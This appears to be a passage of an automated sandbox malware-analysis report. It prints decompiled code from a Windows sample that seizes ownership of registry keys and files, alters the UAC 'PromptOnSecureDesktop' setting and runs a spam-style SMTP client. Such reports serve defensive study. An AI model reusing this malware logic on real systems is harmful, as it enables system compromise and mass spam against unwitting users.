                                                                                						_t130 = RegSetValueExA(_v12, E00402544("PromptOnSecureDesktop", 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, 0x4121a8, _t126 - _t174 + 1);
                                                                                						__eflags = _t130;
                                                                                						if(_t130 == 0) {
                                                                                							 *0x412cc0 = 0;
                                                                                						}
                                                                                						goto L41;
                                                                                					}
                                                                                					_t146 = EqualSid( &_v132, _v16);
                                                                                					__eflags = _t146;
                                                                                					if(_t146 != 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_v12 = 1;
                                                                                					_t175 = LocalAlloc(0x40, 0x14);
                                                                                					__eflags = _t175;
                                                                                					if(_t175 != 0) {
                                                                                						_t148 = InitializeSecurityDescriptor(_t175, 1);
                                                                                						__eflags = _t148;
                                                                                						if(_t148 != 0) {
                                                                                							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
                                                                                							__eflags = _t151;
                                                                                							if(_t151 != 0) {
                                                                                								RegSetKeySecurity(_v28, 1, _t175);
                                                                                							}
                                                                                						}
                                                                                						LocalFree(_t175);
                                                                                					}
                                                                                					goto L12;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,004133B0,?), ref: 00407B16
                                                                                • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
                                                                                • EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
                                                                                • RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407BB2
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                • String ID: D$PromptOnSecureDesktop
                                                                                • API String ID: 2976863881-1403908072
                                                                                • Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                • Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
                                                                                • Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                • Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 02087D21
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 02087D46
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02087D7D
                                                                                • RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 02087DA2
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02087DC0
                                                                                • EqualSid.ADVAPI32(?,?), ref: 02087DD1
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 02087DE5
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02087DF3
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02087E03
                                                                                • RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 02087E12
                                                                                • LocalFree.KERNEL32(00000000), ref: 02087E19
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02087E35
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                • String ID: D$PromptOnSecureDesktop
                                                                                • API String ID: 2976863881-1403908072
                                                                                • Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                • Instruction ID: c91c96f5e7614949d112064d2daf416f60de55ce0c3a00dbf0d7bca7b5f16cf0
                                                                                • Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                • Instruction Fuzzy Hash: 95A18B7690021DAFDB12DFA1DC88FEFBBB8FB08304F148169E541E6160D7758A84DB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E00406511(void* __ecx) {
                                                                                				signed int _t75;
                                                                                				signed int _t76;
                                                                                				int _t78;
                                                                                				void* _t83;
                                                                                				signed int _t93;
                                                                                				void* _t95;
                                                                                				signed int _t99;
                                                                                				int _t101;
                                                                                				int _t115;
                                                                                				int _t117;
                                                                                				void* _t118;
                                                                                				void* _t119;
                                                                                				void* _t120;
                                                                                				void* _t122;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr* _t137;
                                                                                				void* _t139;
                                                                                				void* _t141;
                                                                                				void* _t143;
                                                                                				void* _t144;
                                                                                				void* _t152;
                                                                                
                                                                                				_t122 = __ecx;
                                                                                				_t139 = _t141 - 0x74;
                                                                                				_t75 =  *(_t139 + 0x7c);
                                                                                				_t135 =  *((intOrPtr*)(_t75 + 4));
                                                                                				_t76 =  *_t75;
                                                                                				 *(_t139 + 0x7c) = _t76;
                                                                                				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x61, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
                                                                                				_t143 = _t141 - 0x90c + 0x1c;
                                                                                				_t117 = _t78;
                                                                                				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
                                                                                					E0040E318();
                                                                                					ExitProcess(0);
                                                                                				}
                                                                                				_t83 =  *( *(_t139 + 0x7c) + 0xc);
                                                                                				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
                                                                                				__imp__#8();
                                                                                				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
                                                                                				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
                                                                                				E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
                                                                                				_t144 = _t143 + 0x48;
                                                                                				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
                                                                                				_t93 = 3;
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				 *(_t139 - 0x8c) = _t93;
                                                                                				 *((intOrPtr*)(_t139 - 0x94)) = 0;
                                                                                				_push(0);
                                                                                				 *(_t139 - 0x5c) = _t93;
                                                                                				_push(0);
                                                                                				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
                                                                                				 *((intOrPtr*)(_t139 - 0x64)) = 0;
                                                                                				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
                                                                                				 *(_t139 - 0x6c) = _t93;
                                                                                				 *(_t139 + 0x7c) = _t93;
                                                                                				_push(_t135);
                                                                                				_push(_t139 - 0x98);
                                                                                				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
                                                                                				 *((intOrPtr*)(_t139 - 0x74)) = 0;
                                                                                				_push(0);
                                                                                				while(1) {
                                                                                					_t95 = GetCurrentProcess();
                                                                                					__imp__StackWalk64(0x14c, _t95);
                                                                                					if(_t95 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t95 = 0;
                                                                                					if( *(_t139 + 0x7c) != 0) {
                                                                                						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
                                                                                							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
                                                                                							_t144 = _t144 + 0x1c;
                                                                                							_t119 = _t119 + _t115;
                                                                                							_t95 = 0;
                                                                                						}
                                                                                						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
                                                                                						_push(_t95);
                                                                                						_push(_t95);
                                                                                						_push(_t95);
                                                                                						_push(_t95);
                                                                                						_push(_t135);
                                                                                						_push(_t139 - 0x98);
                                                                                						_push(_t95);
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				 *(_t139 + 0x7c) = _t95;
                                                                                				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
                                                                                				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
                                                                                				do {
                                                                                					_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
                                                                                					if( *_t137 != 0) {
                                                                                						_t99 =  *(_t139 + 0x7c) & 0x80000007;
                                                                                						if(_t99 < 0) {
                                                                                							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
                                                                                						}
                                                                                						if(_t152 == 0) {
                                                                                							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
                                                                                						}
                                                                                						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
                                                                                						_t144 = _t144 + 0x10;
                                                                                						_t120 = _t120 + _t101;
                                                                                						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
                                                                                					}
                                                                                					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
                                                                                				} while ( *(_t139 + 0x70) < 0x20);
                                                                                				wsprintfA(_t139 + _t120 - 0x898, "\n");
                                                                                				E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
                                                                                				E0040E318();
                                                                                				return 1;
                                                                                			}

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                • API String ID: 2400214276-165278494
                                                                                • Opcode ID: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
                                                                                • Instruction ID: d0bbb1ce902d37c6012dbda67fcae0275dd4f0eb650f6cdd038f268f1af807dd
                                                                                • Opcode Fuzzy Hash: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
                                                                                • Instruction Fuzzy Hash: FC615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 49%
                                                                                			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
                                                                                				short _v129;
                                                                                				char _v132;
                                                                                				char _v1156;
                                                                                				signed int _t59;
                                                                                				int _t60;
                                                                                				void* _t61;
                                                                                				char* _t62;
                                                                                				void* _t63;
                                                                                				void* _t65;
                                                                                				void* _t82;
                                                                                				void* _t96;
                                                                                				intOrPtr _t102;
                                                                                				char _t103;
                                                                                				void* _t104;
                                                                                				int _t121;
                                                                                				intOrPtr _t123;
                                                                                				void* _t124;
                                                                                				CHAR* _t125;
                                                                                				intOrPtr* _t126;
                                                                                				intOrPtr* _t127;
                                                                                				void* _t129;
                                                                                				void* _t130;
                                                                                				void* _t131;
                                                                                
                                                                                				_t102 = _a8;
                                                                                				_t2 = _t102 - 1; // 0x0
                                                                                				_t59 = _t2;
                                                                                				_t125 =  &_v132;
                                                                                				if(_t59 > 0xb) {
                                                                                					L21:
                                                                                					_t60 = lstrlenA(_t125);
                                                                                					_t121 = _t60;
                                                                                					_t126 = __imp__#19;
                                                                                					_t61 =  *_t126(_a4, _t125, _t121, 0);
                                                                                					if(_t61 == _t121) {
                                                                                						if(_t102 != 6) {
                                                                                							L28:
                                                                                							_t127 = __imp__#16;
                                                                                							_t103 = 0;
                                                                                							_push(0);
                                                                                							_v1156 = 0;
                                                                                							_v132 = 0;
                                                                                							_push(0x3f6);
                                                                                							_t62 =  &_v1156;
                                                                                							while(1) {
                                                                                								_t63 =  *_t127(_a4, _t62);
                                                                                								if(_t63 <= 0) {
                                                                                									break;
                                                                                								}
                                                                                								_t103 = _t103 + _t63;
                                                                                								if(_t103 > 0x1f4) {
                                                                                									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
                                                                                									_push(6);
                                                                                									L72:
                                                                                									_pop(_t65);
                                                                                									return _t65;
                                                                                								}
                                                                                								 *((char*)(_t130 + _t103 - 0x480)) = 0;
                                                                                								if(_v132 != 0) {
                                                                                									L33:
                                                                                									if(E0040EE95( &_v1156,  &_v132) != 0) {
                                                                                										break;
                                                                                									}
                                                                                									L34:
                                                                                									_push(0);
                                                                                									_push(0x3f6 - _t103);
                                                                                									_t62 = _t130 + _t103 - 0x480;
                                                                                									continue;
                                                                                								}
                                                                                								if(_t103 <= 3) {
                                                                                									goto L34;
                                                                                								}
                                                                                								E0040EE08( &_v132,  &_v1156, 4);
                                                                                								_t131 = _t131 + 0xc;
                                                                                								_v129 = 0x20;
                                                                                								if(_v132 == 0) {
                                                                                									goto L34;
                                                                                								}
                                                                                								goto L33;
                                                                                							}
                                                                                							_t123 = _a8;
                                                                                							if(_t123 == 7) {
                                                                                								L23:
                                                                                								_push(2);
                                                                                								goto L72;
                                                                                							}
                                                                                							if(_t103 <= 5) {
                                                                                								E0040EF00(_a16, "Too small respons\n");
                                                                                							} else {
                                                                                								E0040EE08(_a16,  &_v1156, 0x76);
                                                                                								_t131 = _t131 + 0xc;
                                                                                								_a16[0x76] = 0;
                                                                                							}
                                                                                							if(_t103 < 5 ||  *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
                                                                                								E0040EF00(_a16, "Incorrect respons");
                                                                                								_push(7);
                                                                                							} else {
                                                                                								_t104 = E0040EDAC( &_v1156);
                                                                                								if(_t104 == 0xdc || _t104 == 0xfa || _t104 == 0x162 || _t104 == 0xdd || _t104 == 0x14e || _t104 == 0xeb) {
                                                                                									_t129 = 1;
                                                                                									 *0x413668 = E0040EE95( &_v1156, "ESMTP") & 0xffffff00 | _t74 != 0x00000000;
                                                                                									_t123 = 1;
                                                                                								} else {
                                                                                									_t129 = 0;
                                                                                								}
                                                                                								if(_t123 != 0xc || _t104 != 0x217) {
                                                                                									if(_t129 != 0) {
                                                                                										goto L23;
                                                                                									}
                                                                                									_t76 =  *0x413630;
                                                                                									if( *0x413630 == 0 ||  *0x413634 == _t129 ||  *0x413638 == _t129) {
                                                                                										L70:
                                                                                										_push(0xb);
                                                                                									} else {
                                                                                										if(_t123 != 4 || E0040A699( &_v1156, _t76) == 0) {
                                                                                											if(E0040A699( &_v1156,  *0x413634) == 0) {
                                                                                												if(E0040A699( &_v1156,  *0x413638) == 0) {
                                                                                													if(_t123 == 3 || _t123 == 4 || _t123 == 5 || _t123 == 6) {
                                                                                														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
                                                                                														_push( &_v132);
                                                                                														if(E0040EE95( &_v1156, E0040A7A3(_t82, _t82)) != 0) {
                                                                                															goto L62;
                                                                                														}
                                                                                													}
                                                                                													goto L70;
                                                                                												}
                                                                                												_push(0xa);
                                                                                												goto L72;
                                                                                											}
                                                                                											L62:
                                                                                											_push(9);
                                                                                										} else {
                                                                                											_push(8);
                                                                                										}
                                                                                									}
                                                                                								} else {
                                                                                									_push(0xf);
                                                                                								}
                                                                                							}
                                                                                							goto L72;
                                                                                						}
                                                                                						_t124 = 5;
                                                                                						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
                                                                                						if(_t96 == _t124) {
                                                                                							goto L28;
                                                                                						}
                                                                                						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
                                                                                						return _t124;
                                                                                					}
                                                                                					if(_t102 != 7) {
                                                                                						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
                                                                                						_push(5);
                                                                                						goto L72;
                                                                                					}
                                                                                					goto L23;
                                                                                				}
                                                                                				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
                                                                                					case 0:
                                                                                						goto L28;
                                                                                					case 1:
                                                                                						_push(_a12);
                                                                                						_t100 =  &_v132;
                                                                                						if( *0x413668 == 0) {
                                                                                							_push("helo %s\r\n");
                                                                                						} else {
                                                                                							_push("ehlo %s\r\n");
                                                                                						}
                                                                                						goto L4;
                                                                                					case 2:
                                                                                						_push(_a12);
                                                                                						_push("mail from:<%s>\r\n");
                                                                                						goto L14;
                                                                                					case 3:
                                                                                						_push(_a12);
                                                                                						_push("rcpt to:<%s>\r\n");
                                                                                						L14:
                                                                                						__eax =  &_v132;
                                                                                						L4:
                                                                                						wsprintfA(_t100, ??);
                                                                                						goto L20;
                                                                                					case 4:
                                                                                						_push(7);
                                                                                						_push("data\r\n");
                                                                                						goto L19;
                                                                                					case 5:
                                                                                						goto L21;
                                                                                					case 6:
                                                                                						_push(7);
                                                                                						_push("quit\r\n");
                                                                                						goto L19;
                                                                                					case 7:
                                                                                						goto L21;
                                                                                					case 8:
                                                                                						_push(0xd);
                                                                                						_push("AUTH LOGIN\r\n");
                                                                                						L19:
                                                                                						__eax =  &_v132;
                                                                                						_push( &_v132);
                                                                                						__eax = E0040EE08();
                                                                                						goto L20;
                                                                                					case 9:
                                                                                						__eax = _a12;
                                                                                						_t9 = __eax + 1; // 0x1
                                                                                						__edx = _t9;
                                                                                						do {
                                                                                							__cl =  *__eax;
                                                                                							__eax = __eax + 1;
                                                                                						} while (__cl != 0);
                                                                                						goto L9;
                                                                                					case 0xa:
                                                                                						__eax = _a12;
                                                                                						_t15 = __eax + 1; // 0x1
                                                                                						__edx = _t15;
                                                                                						do {
                                                                                							__cl =  *__eax;
                                                                                							__eax = __eax + 1;
                                                                                						} while (__cl != 0);
                                                                                						L9:
                                                                                						__eax = __eax - __edx;
                                                                                						 *((char*)(__ebp + __eax - 0x80)) = 0;
                                                                                						L20:
                                                                                						_t131 = _t131 + 0xc;
                                                                                						goto L21;
                                                                                				}
                                                                                			}
                                                                                0x0040a7cb
                                                                                0x0040a7cf
                                                                                0x0040a7cf
                                                                                0x0040a7d3
                                                                                0x0040a7d9
                                                                                0x0040a87d
                                                                                0x0040a87e
                                                                                0x0040a886
                                                                                0x0040a88d
                                                                                0x0040a893
                                                                                0x0040a897
                                                                                0x0040a8c2
                                                                                0x0040a8f2
                                                                                0x0040a8f2
                                                                                0x0040a8f8
                                                                                0x0040a8fa
                                                                                0x0040a900
                                                                                0x0040a906
                                                                                0x0040a909
                                                                                0x0040a90a
                                                                                0x0040a978
                                                                                0x0040a97c
                                                                                0x0040a980
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a912
                                                                                0x0040a91a
                                                                                0x0040a9b9
                                                                                0x0040a9c2
                                                                                0x0040ab4a
                                                                                0x0040ab4a
                                                                                0x00000000
                                                                                0x0040ab4a
                                                                                0x0040a924
                                                                                0x0040a92c
                                                                                0x0040a954
                                                                                0x0040a968
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a96a
                                                                                0x0040a96e
                                                                                0x0040a970
                                                                                0x0040a971
                                                                                0x00000000
                                                                                0x0040a971
                                                                                0x0040a931
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a940
                                                                                0x0040a945
                                                                                0x0040a94c
                                                                                0x0040a952
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a952
                                                                                0x0040a982
                                                                                0x0040a988
                                                                                0x0040a89e
                                                                                0x0040a89e
                                                                                0x00000000
                                                                                0x0040a89e

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0040A7FB
                                                                                • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
                                                                                • send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
                                                                                • wsprintfA.USER32 ref: 0040A8AF
                                                                                • send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
                                                                                • wsprintfA.USER32 ref: 0040A8E2
                                                                                • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
                                                                                • wsprintfA.USER32 ref: 0040A9B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$send$lstrlenrecv
                                                                                • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                • API String ID: 3650048968-2394369944
                                                                                • Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                • Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
                                                                                • Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                • Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 02087A96
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02087ACD
                                                                                • GetLengthSid.ADVAPI32(?), ref: 02087ADF
                                                                                • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 02087B01
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02087B1F
                                                                                • EqualSid.ADVAPI32(?,?), ref: 02087B39
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 02087B4A
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02087B58
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02087B68
                                                                                • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 02087B77
                                                                                • LocalFree.KERNEL32(00000000), ref: 02087B7E
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02087B9A
                                                                                • GetAce.ADVAPI32(?,?,?), ref: 02087BCA
                                                                                • EqualSid.ADVAPI32(?,?), ref: 02087BF1
                                                                                • DeleteAce.ADVAPI32(?,?), ref: 02087C0A
                                                                                • EqualSid.ADVAPI32(?,?), ref: 02087C2C
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 02087CB1
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02087CBF
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 02087CD0
                                                                                • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 02087CE0
                                                                                • LocalFree.KERNEL32(00000000), ref: 02087CEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                • String ID: D
                                                                                • API String ID: 3722657555-2746444292
                                                                                • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction ID: 991c8fe0ae6e99c1eaf19421a5fa049f30636ebbda74af3405e4848decb59f10
                                                                                • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction Fuzzy Hash: B0816C75900209AFDB12DFA4DD84FEFBBB8BF08304F14806AE645E7160DB759641DB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E00408328(char* __ecx, char __edx) {
                                                                                				char _v8;
                                                                                				void* _v12;
                                                                                				int _v16;
                                                                                				char _v20;
                                                                                				intOrPtr _v24;
                                                                                				int _v28;
                                                                                				struct _PROCESS_INFORMATION _v44;
                                                                                				char _v60;
                                                                                				struct _STARTUPINFOA _v128;
                                                                                				char _v388;
                                                                                				char _v427;
                                                                                				char _v428;
                                                                                				char _t88;
                                                                                				char _t89;
                                                                                				void* _t91;
                                                                                				char _t93;
                                                                                				int _t102;
                                                                                				char _t107;
                                                                                				intOrPtr _t113;
                                                                                				char _t116;
                                                                                				void* _t117;
                                                                                				signed int _t122;
                                                                                				char _t126;
                                                                                				void* _t128;
                                                                                				char* _t130;
                                                                                				char _t131;
                                                                                				char* _t133;
                                                                                				char _t134;
                                                                                				char* _t137;
                                                                                				int _t139;
                                                                                				char _t144;
                                                                                				char _t146;
                                                                                				char* _t147;
                                                                                				char _t149;
                                                                                				char _t153;
                                                                                				intOrPtr* _t154;
                                                                                				char* _t156;
                                                                                				char* _t159;
                                                                                				char _t160;
                                                                                				char _t165;
                                                                                				void* _t174;
                                                                                				signed int _t177;
                                                                                				char _t180;
                                                                                				char* _t188;
                                                                                				int _t189;
                                                                                				long _t193;
                                                                                				void* _t195;
                                                                                				void* _t196;
                                                                                				void* _t198;
                                                                                				void* _t199;
                                                                                
                                                                                				_t181 = __edx;
                                                                                				_t173 = __ecx;
                                                                                				_v16 = 0;
                                                                                				if(E00407DD6(__edx) != 0) {
                                                                                					return 1;
                                                                                				}
                                                                                				_t88 = E00406EC3();
                                                                                				__eflags = _t88;
                                                                                				if(_t88 != 0) {
                                                                                					_v8 = 0;
                                                                                					__eflags =  *0x412c3c; // 0x0
                                                                                					if(__eflags == 0) {
                                                                                						goto L37;
                                                                                					}
                                                                                					__eflags =  *0x412c38; // 0x0
                                                                                					if(__eflags == 0) {
                                                                                						goto L37;
                                                                                					}
                                                                                					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                					_t198 = _t196 + 0x14;
                                                                                					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
                                                                                					__eflags = _t131;
                                                                                					if(_t131 != 0) {
                                                                                						L31:
                                                                                						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                						_t198 = _t198 + 0x14;
                                                                                						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
                                                                                						__eflags = _t134;
                                                                                						if(_t134 != 0) {
                                                                                							L35:
                                                                                							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
                                                                                							_t196 = _t198 + 0xc;
                                                                                							__eflags = _v8;
                                                                                							if(_v8 != 0) {
                                                                                								E0040EC2E(_v8);
                                                                                							}
                                                                                							goto L37;
                                                                                						}
                                                                                						_t188 =  *0x412c3c; // 0x0
                                                                                						_t137 = _t188;
                                                                                						_t44 =  &(_t137[1]); // 0x1
                                                                                						_t173 = _t44;
